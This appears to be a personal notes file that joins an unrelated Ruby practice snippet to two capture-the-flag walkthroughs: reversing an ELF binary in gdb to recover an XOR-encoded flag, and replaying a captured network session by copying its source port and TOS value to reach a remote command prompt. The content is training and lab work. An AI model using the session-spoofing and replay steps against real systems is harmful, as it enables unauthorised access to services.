puts Math::PI
require 'date'
puts Date.today

module Action
  def jump
    @distance = rand(4) + 2
    puts "I jumped forward #{@distance} feet!"
  end
end
class Rabbit
  include Action
  attr_reader :name
  def initialize(name)
    @name = name
  end
end
peter = Rabbit.new("Peter")
peter.jump

module ThePresent
  def now
    puts "Time"
  end
end
class TheHereAnd
  extend ThePresent
end
TheHereAnd.now

# NcN CTF 2k13: Australia (Base - 500 pts)


# file derp
derp: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=0xbf6173b70ab3b4daee58d25e06e33f1738444a18, not stripped
# chmod +x derp
# echo 0 > /proc/sys/kernel/randomize_va_space
# gdb --quiet ./derp
(gdb) set disassembly-flavor intel
(gdb) break main
(gdb) run
(gdb) disassemble main
(gdb) x/6i 0x080483a4
   0x80483a4 <main+208>: mov    eax,ds:0x80d1088
   0x80483a9 <main+213>: sub    eax,0x2
   0x80483ac <main+216>: mov    DWORD PTR [esp+0x4],eax
   0x80483b0 <main+220>: mov    eax,DWORD PTR [esp+0x1c]
   0x80483b4 <main+224>: mov    DWORD PTR [esp],eax
   0x80483b7 <main+227>: call   0x804841a <check_buffer>
(gdb) x/xw 0x80d1088
0x80d1088 <goodboy_len>: 0x00000042
(gdb) break *0x80483b7
(gdb) continue
Continuing.
Facebook CTF
Enter flag: cookie

Breakpoint 2, 0x080483b7 in main ()
(gdb) info registers eax
eax            0x80d5298 135090840
(gdb) x/s 0x80d5298
0x80d5298:  "cookie\n"
(gdb) break *0x804841a
(gdb) continue
(gdb) disassemble
(gdb) x/3i 0x0804849c
=> 0x804849c <check_buffer+130>: mov    eax,DWORD PTR [ebp-0x4]
   0x804849f <check_buffer+133>: cmp    eax,DWORD PTR [ebp+0xc]
   0x80484a2 <check_buffer+136>: jb     0x804843c <check_buffer+34>
(gdb) break *0x0804849c
(gdb) continue
(gdb) x/xb $ebp-0x4
0xffffd4e4: 0x00
(gdb) x/xb $ebp+0xc
0xffffd4f4: 0x40
(gdb) x/64xb 0x080b2224
0x80b2224: 0xeb 0xe8 0xbf 0xe4 0xea 0xbe 0xba 0xe4
0x80b222c: 0xe5 0xea 0xe8 0xea 0xe8 0xee 0xe9 0xba
0x80b2234: 0xea 0xe8 0xeb 0xba 0xbf 0xba 0xeb 0xea
0x80b223c: 0xe8 0xef 0xbd 0xba 0xed 0xe9 0xba 0xee
0x80b2244: 0xe9 0xed 0xbe 0xed 0xe4 0xea 0xbe 0xba
0x80b224c: 0xe9 0xe4 0xbd 0xea 0xb8 0xe9 0xb8 0xbf
0x80b2254: 0xeb 0xb9 0xbe 0xe4 0xbe 0xba 0xe5 0xbf
0x80b225c: 0xba 0xbf 0xe5 0xb8 0xec 0xe8 0xbf 0xb8
(gdb) x/3i 0x0804848b
=> 0x804848b <check_buffer+113>: xor    eax,ecx
   0x804848d <check_buffer+115>: cmp    dl,al
   0x804848f <check_buffer+117>: je     0x8048498 <check_buffer+126>
(gdb) break *0x0804848b
(gdb) continue
(gdb) info registers eax
eax            0xdc 220
(gdb) info registers ecx
ecx            0x63 99
(gdb) info registers edx
edx            0xeb 235
(gdb) quit
# python -c 'list=[0xeb,0xe8,0xbf,0xe4,0xea,0xbe,0xba,0xe4,0xe5,0xea,0xe8,0xea,0xe8,0xee,0xe9,0xba,0xea,0xe8,0xeb,0xba,0xbf,0xba,0xeb,0xea,0xe8,0xef,0xbd,0xba,0xed,0xe9,0xba,0xee,0xe9,0xed,0xbe,0xed,0xe4,0xea,0xbe,0xba,0xe9,0xe4,0xbd,0xea,0xb8,0xe9,0xb8,0xbf,0xeb,0xb9,0xbe,0xe4,0xbe,0xba,0xe5,0xbf,0xba,0xbf,0xe5,0xb8,0xec,0xe8,0xbf,0xb8]; print "".join(chr(i^0xdc) for i in list)' | ./derp
Facebook CTF
Enter flag: Winner! Post your flag.

# NcN CTF 2k13: USA (Flag)


# tcpflow -C -r traffic.pcap
HELLO! What do you want? 
ERMAHGERD_LEMME_EXECUTE

FINE!
Only one command...
$ 
# tshark -n -q -r traffic.pcap -z "follow,tcp,ascii,0"
===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 192.168.100.15:6969
Node 1: 192.168.100.254:45887
26
 HELLO! What do you want? 
 24
ERMAHGERD_LEMME_EXECUTE

33
 FINE!
 Only one command...
 $ 
===================================================================
# scapy
>>> us=rdpcap("traffic.pcap")
>>> us[0]
<Ether  dst=00:16:3e:63:a1:f6 src=fe:ff:ff:ff:ff:ff type=0x800 |<IP  version=4L ihl=5L tos=0x90 len=60 id=47950 flags=DF frag=0L ttl=64 proto=tcp chksum=0x347f src=192.168.100.254 dst=192.168.100.15 options=[] |<TCP  sport=45887 dport=6969 seq=201010478 ack=0 dataofs=10L reserved=0L flags=S window=14600 chksum=0x4a8d urgptr=0 options=[('MSS', 1460), ('SAckOK', ''), ('Timestamp', (2070112, 0)), ('NOP', None), ('WScale', 7)] |>>>
>>> exit()
# iptables --table mangle --append PREROUTING --dport 6969 --jump TOS --set-tos 0x90
# nc --source-port 45887 192.168.69.5 6969
HELLO! What do you want? ERMAHGERD_LEMME_EXECUTE
FINE!
Only one command...
$ echo 'CookieMonsters' > /tmp/SCORE_POINTS